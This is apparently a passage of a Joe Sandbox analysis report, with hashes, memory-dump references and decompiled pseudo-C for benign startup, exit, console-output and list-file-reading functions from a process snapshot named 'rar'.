                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                            • String ID:
                                                                                                            • API String ID: 3058843127-0
                                                                                                            • Opcode ID: 6773da3e6db94e410f3d6c641b08bc32be97ef8d4c3a83a04defcce550500242
                                                                                                            • Instruction ID: c3130433cf1da640755f17ff13b7f413f6eb1854b640afdc4d0e0f17dbd2b94b
                                                                                                            • Opcode Fuzzy Hash: 6773da3e6db94e410f3d6c641b08bc32be97ef8d4c3a83a04defcce550500242
                                                                                                            • Instruction Fuzzy Hash: 0C3139A1E09103A2FE54AB64D5D13B92291AF47784F6C4035EA0FE73D3DE2FE8458B51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B726D8 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 37%
                                                                                                            			E00007FF67FF650B726D8() {
				void* _t8;
				void* _t16;
				void* _t18;
				void* _t19;

				if (E00007FF67FF650B76FF8(_t16, _t18, _t19) == 0) goto 0x50b72711;
				if (( *( *[gs:0x60] + 0xbc) >> 0x00000008 & 0x00000001) != 0) goto 0x50b72711;
				GetCurrentProcess();
				E00007FF67FF650B72724(TerminateProcess(??, ??), _t8,  *[gs:0x60], _t18);
				ExitProcess(??);
			}







                                                                                                            0x7ff650b726e7
                                                                                                            0x7ff650b726fe
                                                                                                            0x7ff650b72700
                                                                                                            0x7ff650b72713
                                                                                                            0x7ff650b7271a

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                                            • String ID:
                                                                                                            • API String ID: 1703294689-0
                                                                                                            • Opcode ID: 2376395af0cdc0656dbe9d9e747682bc6dabdb0c54ecb51d6a03a75ba433db16
                                                                                                            • Instruction ID: e4fecddd004c4057d74e592933a59d171e30269e5077734c278aa96fd74ab924
                                                                                                            • Opcode Fuzzy Hash: 2376395af0cdc0656dbe9d9e747682bc6dabdb0c54ecb51d6a03a75ba433db16
                                                                                                            • Instruction Fuzzy Hash: EDE0B814B1470752EED85B215DD537923625F8A781F185438CC4FA7396DD3FEC498211
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B27AC4 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ConsoleFileHandleModeType
                                                                                                            • String ID:
                                                                                                            • API String ID: 4141822043-0
                                                                                                            • Opcode ID: 710ab64cbb8081c449d73764b8f49ff24247a6329f6fc35a7e21e7740e9a9690
                                                                                                            • Instruction ID: a05437703fb61a33108535da62f72d414ecc281aa6c562a59c64b37c52e7622c
                                                                                                            • Opcode Fuzzy Hash: 710ab64cbb8081c449d73764b8f49ff24247a6329f6fc35a7e21e7740e9a9690
                                                                                                            • Instruction Fuzzy Hash: F8E0C220E15B0363EE94472168D503923909F1FBE1F981030C80FDB360DE2ED0858304
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B24680 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 80COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 66%
                                                                                                            			E00007FF67FF650B24680(void* __ecx, long long __rbx, void* __rcx, void* __rdx, void* __r9, long long _a8) {
				signed int _v24;
				char _v184;
				intOrPtr _v192;
				signed long long _v200;
				void* __rdi;
				void* _t24;
				intOrPtr _t39;
				signed long long _t47;
				signed long long _t48;
				void* _t50;
				signed long long _t51;
				signed long long _t52;
				void* _t70;
				void* _t71;
				void* _t72;
				void* _t73;

				_t77 = __r9;
				_a8 = __rbx;
				_t74 = _t73 - 0xe0;
				_t47 =  *0x50b978f0; // 0x27db226282f1
				_t48 = _t47 ^ _t73 - 0x000000e0;
				_v24 = _t48;
				_t50 = __rcx;
				if ( *((char*)(__rcx + 0x9528)) != 0) goto 0x50b247b3;
				if ( *((char*)(__rcx + 0x7155)) != 0) goto 0x50b247b3;
				if ( *0x50b98954 != 0) goto 0x50b247b3;
				r9d = 6;
				 *0x50b98954 = 1;
				_t76 = L"%d.%02d";
				_v200 = 0xa;
				_t39 = __r9 + 0x4a;
				E00007FF67FF650B1657C(__ecx, _t48,  &_v184, __rdx, L"%d.%02d", __r9);
				r8d = _t39;
				E00007FF67FF650B5A368(_t48,  &_v184, L"%d.%02d");
				E00007FF67FF650B54598(0xbd6, _t39, _t50, _t71, _t72, L"%d.%02d");
				r8d = _t39;
				E00007FF67FF650B5A368(_t48,  &_v184, _t76);
				if ( *((char*)(_t50 + 0x7158)) != 0) goto 0x50b247d4;
				E00007FF67FF650B5B764(0, _t39, _t48, _t50,  &_v184, _t48, _t70, _t71, _t76, _t77);
				_t51 = _t48;
				E00007FF67FF650B54598(0xbc8, _t39, _t51, _t71, _t72, _t76);
				r8d = 0x7e6;
				r9d = _t70 - 0x38;
				_v192 = r8d;
				_v200 = _t51;
				_t24 = E00007FF67FF650B283F0(_t48,  &_v184, _t76, _t77); // executed
				E00007FF67FF650B23ABC(_t24);
				_t52 = _t48;
				if (E00007FF67FF650B23AC4() == 0) goto 0x50b24788;
				E00007FF67FF650B54598(0xbca, _t39, _t52, _t71, _t72, _t76);
				goto 0x50b247ae;
				E00007FF67FF650B54598(0xbcc, _t39, _t52, _t71, _t72, _t76);
				E00007FF67FF650B283F0(_t48, _t52, _t76, _t77);
				_t15 = _t52 + 0x400; // 0x400
				if ( *_t15 == 0) goto 0x50b247b3;
				return E00007FF67FF650B69D10(E00007FF67FF650B283F0(L"%s", _t15, _t76, _t77), 0xbcc, _v24 ^ _t74);
			}



















                                                                                                            0x7ff650b24680
                                                                                                            0x7ff650b24680
                                                                                                            0x7ff650b24686
                                                                                                            0x7ff650b2468d
                                                                                                            0x7ff650b24694
                                                                                                            0x7ff650b24697
                                                                                                            0x7ff650b246a6
                                                                                                            0x7ff650b246a9
                                                                                                            0x7ff650b246b6
                                                                                                            0x7ff650b246c3
                                                                                                            0x7ff650b246c9
                                                                                                            0x7ff650b246cf
                                                                                                            0x7ff650b246d6
                                                                                                            0x7ff650b246dd
                                                                                                            0x7ff650b246ea
                                                                                                            0x7ff650b246f0
                                                                                                            0x7ff650b246f5
                                                                                                            0x7ff650b24704
                                                                                                            0x7ff650b2470e
                                                                                                            0x7ff650b2471b
                                                                                                            0x7ff650b2471e
                                                                                                            0x7ff650b2472a
                                                                                                            0x7ff650b24732
                                                                                                            0x7ff650b2473c
                                                                                                            0x7ff650b2473f
                                                                                                            0x7ff650b24744
                                                                                                            0x7ff650b2474a
                                                                                                            0x7ff650b2474e
                                                                                                            0x7ff650b2475b
                                                                                                            0x7ff650b24760
                                                                                                            0x7ff650b24765
                                                                                                            0x7ff650b2476a
                                                                                                            0x7ff650b24774
                                                                                                            0x7ff650b2477b
                                                                                                            0x7ff650b24786
                                                                                                            0x7ff650b2478d
                                                                                                            0x7ff650b24795
                                                                                                            0x7ff650b2479a
                                                                                                            0x7ff650b247a5
                                                                                                            0x7ff650b247d3

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: LoadString$fflushswprintf
                                                                                                            • String ID: %d.%02d
                                                                                                            • API String ID: 1946543793-4183121600
                                                                                                            • Opcode ID: 3a5b9333e199d93c95e87bbddfcae53242d1f63cabf87f049b448a194120cd96
                                                                                                            • Instruction ID: e659da6d4ee3deb7045b2847998a6316aae5e9c72fcd22c3998eba18b1111298
                                                                                                            • Opcode Fuzzy Hash: 3a5b9333e199d93c95e87bbddfcae53242d1f63cabf87f049b448a194120cd96
                                                                                                            • Instruction Fuzzy Hash: B431BF21E1D28361FA60AB10E4953BD2390AF97748F4C0435EA4FAB7DADF6EE445C741
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B28208 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 23COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E00007FF67FF650B28208(long long __rcx, long long __rdx, long long __r8, long long __r9, intOrPtr _a8, char _a16) {
				void* _t10;
				void* _t14;
				struct _IO_FILE* _t15;
				void* _t23;

				_t14 = _t23;
				 *((long long*)(_t14 + 8)) = __rcx;
				 *((long long*)(_t14 + 0x10)) = __rdx;
				 *((long long*)(_t14 + 0x18)) = __r8;
				 *((long long*)(_t14 + 0x20)) = __r9;
				if ( *0x50b99964 == 3) goto 0x50b2825a;
				E00007FF67FF650B72A80(1, _t14);
				fflush(_t15);
				E00007FF67FF650B72A80(2, _t14);
				_t10 = E00007FF67FF650B2803C(_t14, _a8,  &_a16); // executed
				return _t10;
			}







                                                                                                            0x7ff650b28208
                                                                                                            0x7ff650b2820b
                                                                                                            0x7ff650b2820f
                                                                                                            0x7ff650b28213
                                                                                                            0x7ff650b28217
                                                                                                            0x7ff650b28227
                                                                                                            0x7ff650b2822e
                                                                                                            0x7ff650b28236
                                                                                                            0x7ff650b28245
                                                                                                            0x7ff650b28255
                                                                                                            0x7ff650b2825f

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileHandleWritefflush
                                                                                                            • String ID: The system cannot find the file specified.
                                                                                                            • API String ID: 552385020-3806670226
                                                                                                            • Opcode ID: e51df7c4de38c5774f3d800be2ba528704773ccc787a10580008c9c0691f5277
                                                                                                            • Instruction ID: 9adc3ecde34b342e45423f7d27da9a5989b898d2b78298f078bbf25507a887b9
                                                                                                            • Opcode Fuzzy Hash: e51df7c4de38c5774f3d800be2ba528704773ccc787a10580008c9c0691f5277
                                                                                                            • Instruction Fuzzy Hash: 3AF06571D1674791EA59A751A8811793794EB9ABC0F0C4038E64FA3392DE3DD495C740
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B34400 Relevance: 3.3, APIs: 2, Instructions: 349COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 60%
                                                                                                            			E00007FF67FF650B34400(void* __ecx, void* __edx, void* __esi, void* __rax, signed long long __rbx, void* __rcx, long long __rdx, void* __r8, void* __r9, void* __r10) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t105;
				void* _t107;
				signed int _t118;
				void* _t148;
				signed short _t149;
				signed int _t151;
				signed int _t152;
				void* _t153;
				void* _t180;
				signed long long _t211;
				void* _t215;
				signed long long _t216;
				short* _t221;
				signed long long _t222;
				signed long long _t224;
				signed long long _t225;
				void* _t227;
				signed long long _t244;
				void* _t276;
				signed long long _t279;
				signed long long _t280;
				signed short* _t284;
				signed short* _t285;
				CHAR* _t289;
				char* _t292;
				char* _t293;
				void* _t295;
				void* _t296;
				void* _t298;
				signed long long _t299;
				void* _t314;
				void* _t316;
				signed char* _t318;
				void* _t319;
				void* _t324;
				signed short* _t327;
				void* _t330;
				signed long long _t331;
				signed short* _t332;
				signed short* _t333;
				long long _t335;
				signed long long _t338;

				_t314 = __r10;
				_t301 = __r8;
				_t227 = __rcx;
				_t225 = __rbx;
				_t148 = __esi;
				 *((long long*)(_t298 + 0x18)) = __rbx;
				_t296 = _t298 - 0x2ff0;
				E00007FF67FF650B69CB0(0x30f0, __rax, __r10, _t316);
				_t299 = _t298 - __rax;
				_t211 =  *0x50b978f0; // 0x27db226282f1
				 *(_t296 + 0x2fe0) = _t211 ^ _t299;
				dil = r9b;
				 *((long long*)(_t296 - 0x70)) = __rdx;
				 *((short*)(_t296 + 0xfe0)) = 0;
				_t6 = _t225 + 1; // 0x1
				r13d = _t6;
				if (__rcx == 0) goto 0x50b34480;
				r8d = 0x800;
				if (r8b == 0) goto 0x50b34471;
				 *((char*)(_t299 + 0x20)) = 0;
				r9b = r13b;
				E00007FF67FF650B442A0(__rbx, __rcx, _t296 + 0xfe0, _t289, _t296, __r8, _t335, _t330); // executed
				goto 0x50b34480;
				E00007FF67FF650B5A390(_t296 + 0xfe0, _t227, _t301);
				E00007FF67FF650B31C28(_t296 - 0x60);
				if ( *((intOrPtr*)(_t296 + 0xfe0)) == 0) goto 0x50b344d5;
				if (dil == 0) goto 0x50b344aa;
				E00007FF67FF650B3298C(_t296 - 0x60, _t296 + 0xfe0);
				goto 0x50b344b2;
				r8d = 0; // executed
				_t105 = E00007FF67FF650B321C0(_t211 ^ _t299, _t225, _t296 - 0x60, _t296 + 0xfe0); // executed
				if (_t105 != 0) goto 0x50b344d9;
				if (dil == 0) goto 0x50b348e2;
				E00007FF67FF650B2C930(6, dil, _t225, 0x50ba7ab8, _t296 + 0xfe0, _t301, __r9);
				goto 0x50b348e2;
				 *((intOrPtr*)(_t296 - 0x4c)) = r13d;
				r14d = 0;
				_t107 = E00007FF67FF650B11344(_t211 ^ _t299, _t299 + 0x60);
				goto 0x50b34512;
				r14d = r14d + _t107;
				E00007FF67FF650B11754(_t225, _t299 + 0x60,  *((intOrPtr*)(_t299 + 0x60)),  *((intOrPtr*)(_t299 + 0x60)), _t324);
				if (E00007FF67FF650B32500(_t148, _t225, _t296 - 0x60,  *((intOrPtr*)(_t299 + 0x60)) +  *((intOrPtr*)(_t299 + 0x60)), _t276, __r9) != 0) goto 0x50b344f8;
				r15d = r14d;
				if (_t335 -  *((intOrPtr*)(_t299 + 0x70)) <= 0) goto 0x50b3454a;
				E00007FF67FF650B11754(_t225, _t299 + 0x60,  *((intOrPtr*)(_t299 + 0x60)) +  *((intOrPtr*)(_t299 + 0x60)) -  *((intOrPtr*)(_t299 + 0x68)),  *((intOrPtr*)(_t299 + 0x60)), _t319);
				_t292 =  *((intOrPtr*)(_t299 + 0x60));
				goto 0x50b34552;
				 *((long long*)(_t299 + 0x68)) = _t335;
				if (r14d - 2 < 0) goto 0x50b34625;
				if ( *_t292 != 0xff) goto 0x50b34625;
				if ( *((char*)(_t292 + 1)) != 0xfe) goto 0x50b34625;
				r12d = r13d;
				 *((intOrPtr*)(_t299 + 0x34)) = 0;
				 *(_t296 - 0x78) = _t225;
				if (r14d - 3 < 0) goto 0x50b34596;
				if ( *_t292 != 0xef) goto 0x50b34596;
				if ( *((char*)(_t292 + 1)) != 0xbb) goto 0x50b34596;
				 *(_t299 + 0x30) = r13b;
				if ( *((char*)(_t292 + 2)) == 0xbf) goto 0x50b3459a;
				 *(_t299 + 0x30) = 0;
				r14d =  *((intOrPtr*)(_t296 + 0x3050));
				if (r14d != 0) goto 0x50b345b4;
				r14d = E00007FF67FF650B34350(_t225, _t292, _t335, _t292, _t276);
				 *(_t299 + 0x38) = _t225;
				 *(_t299 + 0x40) = _t225;
				 *(_t299 + 0x48) = _t225;
				 *(_t299 + 0x50) = _t225;
				 *((char*)(_t299 + 0x58)) = 0;
				if (r14d - 2 > 0) goto 0x50b3466e;
				E00007FF67FF650B197D0(0, _t225, _t299 + 0x60, _t276);
				_t293 =  *((intOrPtr*)(_t299 + 0x60));
				if (r14d != 2) goto 0x50b34602;
				OemToCharA(_t289);
				_t279 =  *((intOrPtr*)(_t299 + 0x68));
				if (_t279 == 0) goto 0x50b34653;
				E00007FF67FF650B177C8(_t225, _t299 + 0x38, _t279, _t279, _t293);
				goto 0x50b3465b;
				r12d = 0;
				if (r14d - 2 < 0) goto 0x50b34572;
				if ( *_t293 != 0xfe) goto 0x50b34572;
				if ( *((char*)(_t293 + 1)) != 0xff) goto 0x50b34572;
				 *((intOrPtr*)(_t299 + 0x34)) = r13d;
				 *(_t296 - 0x78) =  *(_t299 + 0x38);
				goto 0x50b3457a;
				_t338 = _t279;
				 *(_t299 + 0x40) = _t279;
				E00007FF67FF650B5D098(0, _t225, _t293,  *(_t299 + 0x38), _t293, _t338, _t295);
				if (r14d != 3) goto 0x50b34797;
				r14d = 2;
				if (r12d != 0) goto 0x50b34692;
				if ( *((intOrPtr*)(_t299 + 0x34)) != 0) goto 0x50b34692;
				_t331 = _t225;
				r12d = 1;
				_t215 = (_t279 >> 1) + 1;
				if (_t215 -  *(_t299 + 0x48) <= 0) goto 0x50b346b7;
				_t216 = _t215 - _t338;
				_t51 = _t299 + 0x38; // 0x39
				E00007FF67FF650B177C8(_t225, _t51, _t216, _t279, _t293);
				_t327 =  *(_t299 + 0x38);
				goto 0x50b346bc;
				 *(_t299 + 0x40) = _t216;
				_t280 = _t279 & 0xfffffffe;
				_t180 = _t331 - _t280;
				if (_t180 >= 0) goto 0x50b34715;
				_t244 =  *(_t296 - 0x78);
				_t318 = _t293 + _t244 + _t331;
				_t304 = _t318;
				r10d = r12d;
				_t327[_t318 - _t318 >> 1] = ( *(_t314 - _t244 + _t318) & 0x000000ff) * 0x100 + ( *_t318 & 0x000000ff);
				if (_t180 != 0) goto 0x50b346e6;
				goto 0x50b34718;
				_t327[_t280 - _t331 - _t331 >> 1] = 0;
				_t284 = _t327;
				if ( *_t327 == 0) goto 0x50b348bb;
				_t149 =  *_t327 & 0x0000ffff;
				_t332 = _t284;
				if (_t149 == 0xd) goto 0x50b34787;
				_t118 = _t149 & 0x0000ffff;
				if (_t118 == 0xa) goto 0x50b34787;
				if (_t118 == 0) goto 0x50b34787;
				if ( *((intOrPtr*)(_t296 + 0x3060)) == 0) goto 0x50b34776;
				if (_t118 != 0x2f) goto 0x50b34776;
				if (_t332[1] != _t118) goto 0x50b34776;
				 *_t332 = 0;
				_t333 =  &(_t332[1]);
				_t151 =  *_t333 & 0x0000ffff;
				if (_t151 != 0xd) goto 0x50b3474c;
				 *_t333 = 0;
				_t221 =  !=  ? _t332 : _t333;
				goto 0x50b34809;
				if (r14d != 4) goto 0x50b34721;
				E00007FF67FF650B197D0(0, _t225, _t299 + 0x60,  &(_t304[2]));
				if ( *((intOrPtr*)(_t299 + 0x68)) -  *(_t299 + 0x48) <= 0) goto 0x50b347d9;
				E00007FF67FF650B177C8(_t225, _t299 + 0x38,  *((intOrPtr*)(_t299 + 0x68)) -  *((intOrPtr*)(_t296 - 0x70)), _t284, _t293);
				goto 0x50b347de;
				 *(_t299 + 0x30) =  ~( *(_t299 + 0x30));
				asm("dec eax");
				E00007FF67FF650B5D1FC(_t225, _t299 + 0x38 +  *((intOrPtr*)(_t299 + 0x60)),  *(_t299 + 0x38),  *(_t299 + 0x40));
				goto 0x50b34726;
				if ( *_t221 == 0x20) goto 0x50b34806;
				if ( *_t221 != 9) goto 0x50b34812;
				 *_t221 = 0;
				_t222 = _t221 - 2;
				if (_t222 - _t284 >= 0) goto 0x50b347fa;
				if ( *((intOrPtr*)(_t296 + 0x3058)) == 0) goto 0x50b3483e;
				if ( *_t284 != 0x22) goto 0x50b3483e;
				_t224 = (_t222 | 0xffffffff) + 1;
				if (_t284[_t224] != 0) goto 0x50b34824;
				if ( *((short*)(_t284 + _t224 * 2 - 2)) != 0x22) goto 0x50b3483e;
				 *((short*)(_t284 + _t224 * 2 - 2)) = 0;
				_t285 =  &(_t284[1]);
				if ( *((intOrPtr*)(_t296 + 0x3068)) == 0) goto 0x50b34884;
				if ( *_t285 != 0x25) goto 0x50b34884;
				 *((short*)(_t296 + 0x1fe0)) = 0;
				r8d = 0x800;
				if (ExpandEnvironmentStringsW(??, ??, ??) - 1 - 0x7fe > 0) goto 0x50b34884;
				if ( *((intOrPtr*)(_t296 + 0x1fe0)) == 0) goto 0x50b34894;
				goto 0x50b3488c;
				if ( *_t285 == 0) goto 0x50b34894;
				E00007FF67FF650B5A3F0(_t225,  *((intOrPtr*)(_t296 - 0x70)), _t285, _t293, _t296);
				if (_t151 == 0) goto 0x50b348bb;
				_t91 =  &(_t333[1]); // 0x2
				_t152 =  *_t91 & 0x0000ffff;
				if (_t152 == 0xd) goto 0x50b348ac;
				if (_t152 != 0xa) goto 0x50b348b2;
				goto 0x50b3489d;
				if (_t152 != 0) goto 0x50b3473d;
				if ( *((intOrPtr*)(_t299 + 0x58)) == 0) goto 0x50b348cd;
				E00007FF67FF650B57B7C(0, 0x1000, _t153,  *(_t299 + 0x38),  *(_t299 + 0x48) +  *(_t299 + 0x48),  &(_t91[1]));
				0x50b6edd8();
				E00007FF67FF650B11534(_t299 + 0x60);
				E00007FF67FF650B31C70(_t296 - 0x60);
				return E00007FF67FF650B69D10(1, 0,  *(_t296 + 0x2fe0) ^ _t299);
			}
















































                                                                                                            0x7ff650b34400
                                                                                                            0x7ff650b34400
                                                                                                            0x7ff650b34400
                                                                                                            0x7ff650b34400
                                                                                                            0x7ff650b34400
                                                                                                            0x7ff650b34400
                                                                                                            0x7ff650b34410
                                                                                                            0x7ff650b3441d
                                                                                                            0x7ff650b34422
                                                                                                            0x7ff650b34425
                                                                                                            0x7ff650b3442f
                                                                                                            0x7ff650b34436
                                                                                                            0x7ff650b34439
                                                                                                            0x7ff650b3443f
                                                                                                            0x7ff650b3444b
                                                                                                            0x7ff650b3444b
                                                                                                            0x7ff650b34452
                                                                                                            0x7ff650b34457
                                                                                                            0x7ff650b3445a
                                                                                                            0x7ff650b3445c
                                                                                                            0x7ff650b34460
                                                                                                            0x7ff650b3446a
                                                                                                            0x7ff650b3446f
                                                                                                            0x7ff650b3447b
                                                                                                            0x7ff650b34484
                                                                                                            0x7ff650b34491
                                                                                                            0x7ff650b344a1
                                                                                                            0x7ff650b344a3
                                                                                                            0x7ff650b344a8
                                                                                                            0x7ff650b344aa
                                                                                                            0x7ff650b344ad
                                                                                                            0x7ff650b344b4
                                                                                                            0x7ff650b344b9
                                                                                                            0x7ff650b344cb
                                                                                                            0x7ff650b344d0
                                                                                                            0x7ff650b344d5
                                                                                                            0x7ff650b344d9
                                                                                                            0x7ff650b344e8
                                                                                                            0x7ff650b344f6
                                                                                                            0x7ff650b344f8
                                                                                                            0x7ff650b34502
                                                                                                            0x7ff650b34520
                                                                                                            0x7ff650b34522
                                                                                                            0x7ff650b3452a
                                                                                                            0x7ff650b34539
                                                                                                            0x7ff650b34543
                                                                                                            0x7ff650b34548
                                                                                                            0x7ff650b3454d
                                                                                                            0x7ff650b34556
                                                                                                            0x7ff650b3455f
                                                                                                            0x7ff650b34569
                                                                                                            0x7ff650b3456f
                                                                                                            0x7ff650b34572
                                                                                                            0x7ff650b34576
                                                                                                            0x7ff650b3457e
                                                                                                            0x7ff650b34583
                                                                                                            0x7ff650b34589
                                                                                                            0x7ff650b3458f
                                                                                                            0x7ff650b34594
                                                                                                            0x7ff650b34596
                                                                                                            0x7ff650b3459a
                                                                                                            0x7ff650b345a4
                                                                                                            0x7ff650b345b1
                                                                                                            0x7ff650b345b7
